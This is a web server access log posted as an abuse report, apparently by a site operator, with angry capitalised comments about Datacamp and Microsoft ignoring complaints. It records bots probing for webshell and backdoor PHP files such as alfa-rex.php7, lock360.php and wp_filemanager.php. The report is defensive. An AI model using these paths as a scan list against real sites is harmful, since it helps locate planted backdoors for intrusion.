52.169.25.28 website*x.com – – [30/Aug/2025:08:43:47 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:43:47 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:44:02 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:44:17 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:44:32 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:44:47 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:45:02 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:45:17 +0200] „GET /class9.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:45:32 +0200] „GET /pass.php HTTP/1.0“ 403 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:45:32 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:45:47 +0200] „GET /ot.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:46:02 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:46:17 +0200] „GET /lo.php HTTP/1.0“ 302 – „-“ „-“
52.169.25.28 website*x.com – – [30/Aug/2025:08:46:32 +0200] „GET /asd67.php HTTP/1.0“ 302 – „-“ „-“
AS212238 – Datacamp Limited – VERY UNWANTED! – TO MANY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cdn77.com,abuse@hostglobal.plus – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!!!
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:54 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /images/class-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /wp-content/1.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /wp-content/themes/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /text.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /function/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:55 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /wp-admin/css/about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /tinyfilemanager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /contact.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /wp-content/themes/pridmag/db.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /ws.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /file/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /wp-2019.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:56 +0200] „GET /wp-load.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /.well-known/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /assets/images/doc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /z.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /wp-admin/network/natural.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /dashboard.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /wp-admin/css/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:57 +0200] „GET /css.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /wp-admin/images/admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /wp-content/updates.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /xx.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /geju.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /wp-content/themes/admin.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /radio.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:58 +0200] „GET /mah/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /wp-admin/includes/nav.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /wp-includes/assets/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /wp-content/upgrade/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /x.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /admin/upload/css.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.8 website*x.com – – [30/Aug/2025:08:46:59 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /byp.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /license.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /wp-includes/SimplePie/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /wp-content/themes/deeto/login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /cgi-bin/file.php HTTP/1.0“ 404 16 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:00 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /wp-admin/install.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /alfa-rex.php7 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /wp-includes/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /cc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /wp-content/plugins/seoplugins/mar.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
154.47.25.8 website*x.com – – [30/Aug/2025:08:47:01 +0200] „GET /about/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
…and so on… and so on…!!!
+
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:08 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:08 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:08 +0200] „GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:08 +0200] „GET /wp-includes/blocks/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:08 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /user.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /wp-includes/wp-class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /ty.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /upload.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /tiny.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /nciii.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /wp-admin/admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:09 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /admin/log.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /wp-mail.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /wp-includes/Requests/library/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /wp-links.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /fm.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /elp.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:10 +0200] „GET /wp-includes/assets/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /wp-content/themes/twentytwenty/404.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /wp-includes/ID3/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /ioxi002.PhP7 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /wp-admin/network/admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:11 +0200] „GET /profile.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:12 +0200] „GET /users.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:12 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:12 +0200] „GET /v.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:12 +0200] „GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:12 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:12 +0200] „GET /a.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:13 +0200] „GET /wp-admin/setup-config.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:13 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:13 +0200] „GET /edit.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:13 +0200] „GET /filemanager/dialog.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
154.47.25.10 website*x.com – – [30/Aug/2025:08:47:13 +0200] „GET /faiy.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
…and so on… and so on…!!!

MAIL NR. 9 TODAY!
abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@cheapy.host
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
HERE WITH 4 IP´S! – VERY UNSECURE PROVIDER!!!
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:39 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:39 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:40 +0200] „GET /NewFile.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:45 +0200] „GET /dejavu.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:46 +0200] „GET /bugz.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:46 +0200] „GET /first.php HTTP/1.0“ 302 – „-“ „-“
